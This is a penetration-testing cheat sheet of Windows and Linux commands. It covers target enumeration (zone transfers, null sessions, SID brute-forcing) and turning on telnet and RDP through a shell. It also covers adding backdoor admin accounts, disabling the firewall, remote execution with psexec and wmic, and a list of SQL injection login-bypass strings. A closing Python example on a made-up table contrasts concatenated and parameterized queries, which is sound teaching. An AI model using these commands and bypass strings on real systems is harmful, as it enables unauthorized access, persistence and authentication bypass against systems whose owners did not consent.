Knowledge Base
sTunnel // Proxytunnel
Use OpenSSL like Netcat:
openssl s_client -connect www.example.com:443
BATCH FILES TO RUN COMMANDS
NSlookup command line:
nslookup -type=[option] [DOMAIN]
Zone Transfers:
host -l [DOMAINNAME] [DNS-SERVER]
host -l goldcup.com ns.goldcup.com <-- example
SNMP Walk:
snmpwalk -c [STRING] -v[version] [TARGET IP]
Set Null session:
net use \\[TARGET IP] "" /u:""
Find SID:
user2sid.exe \\[TARGET IP] [TARGET COMPUTER NAME]
user2sid.exe \\[TARGET IP] [USER NAME]
Enumeration loop:
for /L %i in (1000,1,1010) do @sid2user \\[TARGET IP] 5 [TARGET SID] %i
Service is Dead alert:
while nc -z -w3 127.0.0.1 25 >/dev/null 2>&1; do echo "Service is ok"; sleep 1; done; echo "Service is dead"; while true; do echo -e "\x07"; done
(the loop is driven by nc's exit status; wrapping nc in backticks would substitute its output instead, and -vv output goes to stderr, hence the 2>&1)
Updating Metasploit:
svn update
Activate telnet through shell (WINDOWS):
Check current status:
sc query tlntsvr
Change startup type to automatic:
sc config tlntsvr start= auto
Turn service on:
sc start tlntsvr
Add new user:
net user [USERNAME] [PASS] /add
Add to localgroup:
net localgroup TelnetClients [USERNAME] /add
Configure firewall to open single port:
netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=[YourIPAddress]
Activate Remote Desktop through shell (WINDOWS):
Check current status:
sc query termservice
Change startup type to automatic:
sc config termservice start= auto
Turn service on:
sc start termservice
Change Registry to allow connection:
reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0
Add new user: [SAME AS ABOVE]
Add to user group:
net localgroup "Remote Desktop Users" [USERNAME] /add
Configure Firewall to open single port:
netsh firewall set service type=remotedesktop mode=enable scope=custom addresses=[YourIPAddress]
WINDOWS COMMANDS
Adding users:
net user [USERNAME] [PASS] /add
Add to local admin group:
net localgroup administrators [USERNAME] /add
Remove user from a group:
net localgroup [GROUP] [USERNAME] /del
Delete an account:
net user [USERNAME] /del
Delete firewall rules:
netsh firewall del portopening protocol=[TCP/UDP] port=[PORT_NUMBER]
Disable firewall altogether:
netsh firewall set opmode disable
Set up a session with a target:
net use \\[IP] [PASSWORD] /u:[USERNAME]
Mount a share:
net use * \\[IP]\[SHARE]$ [PASSWD] /u:[USERNAME]
Some machines require the computer name before the user: /u:[HOSTNAME]\[USERNAME]
Remove session:
net use \\[IP] /del
Remove all sessions:
net use * /del
EXECUTE COMMANDS ON TARGET MACHINE:
PSEXEC:
psexec \\[TARGET] -d -u [USER] -p [PASSWORD] [COMMAND]
WMIC: (on by default)
Run Program on Target Immediately:
wmic /node:[TARGET] /user:[ADMIN-USR] /password:[PASSWORD] process call create [COMMAND]
List Processes on Target:
wmic /node:[TARGET] /user:[ADMIN-USR] /password:[PASSWORD] process list brief
Kill Process on Target by PID:
wmic /node:[TARGET] /user:[ADMIN-USR] /password:[PASSWORD] process where processid="[PID]" delete
Kill Process on Target by name:
wmic /node:[TARGET] /user:[ADMIN-USR] /password:[PASSWORD] process where name="[NAME]" delete
USING SAMBA:
smbclient //[TARGET]/c$ [password] -U [username] # Works like FTP for SMB (ls, get, put, ...)
smbclient -L [IP/HOSTNAME] # Lists the shares available on the host
smbmount //[TARGET]/[SHARE] /mnt/[MOUNT-POINT] ## Mount Share
## Mount the share with user/pass ##
smbmount //[TARGET]/[SHARE] /mnt/[MOUNT-POINT] -o username=[USER],password=[PASS],rw
umount /mnt/[MOUNT-POINT] # Remove mounted share
GUI: System >> Remote Places >> SAMBA Shares
SQL INJECTION:
-------------------------
Windows SQL injection (site contains an /admin/login.asp or login.asp page)
Instead of a password, use one of these strings:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
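Why these strings work against a concatenated login query, and why a parameterized query is immune to every one of them, as an added example that is not part of the original page. It assumes a constructed in-memory SQLite table with one made-up account; the query shape mirrors the classic login.asp pattern, and the parenthesized variant is included to show that each listed string only matches a particular query shape.

```python
import sqlite3

# Constructed sample table with one made-up account (not from any real site).
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    return conn

def login_vulnerable(conn, username, password):
    # The login.asp pattern: user input is pasted into the SQL text, so a
    # quote ends the literal and the rest of the input is parsed as SQL.
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None

def login_parameterized(conn, username, password):
    # Placeholders hand the strings to the engine as data; quotes, OR and
    # comment markers inside them never become SQL syntax.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None

# Four of the strings listed above, tried in the password field.
PAYLOADS = ["' or 1=1--", "' or 'a'='a", '" or "a"="a', "') or ('a'='a"]

def compare(conn):
    """Map each payload to (concatenated result, parameterized result).

    'syntax error' means the payload's shape (quote style or parentheses)
    does not match this particular query; the other listed variants exist
    precisely because the surrounding query differs from site to site.
    """
    results = {}
    for p in PAYLOADS:
        try:
            vulnerable = login_vulnerable(conn, "admin", p)
        except sqlite3.OperationalError:
            vulnerable = "syntax error"
        results[p] = (vulnerable, login_parameterized(conn, "admin", p))
    return results

if __name__ == "__main__":
    for payload, (vuln, safe) in compare(build_db()).items():
        print(f"{payload!r:20} concatenated={vuln!s:13} parameterized={safe}")
```

The same mechanism is what a code reviewer looks for: any query built by string concatenation from request data is the finding, regardless of which of the listed strings happens to fit it.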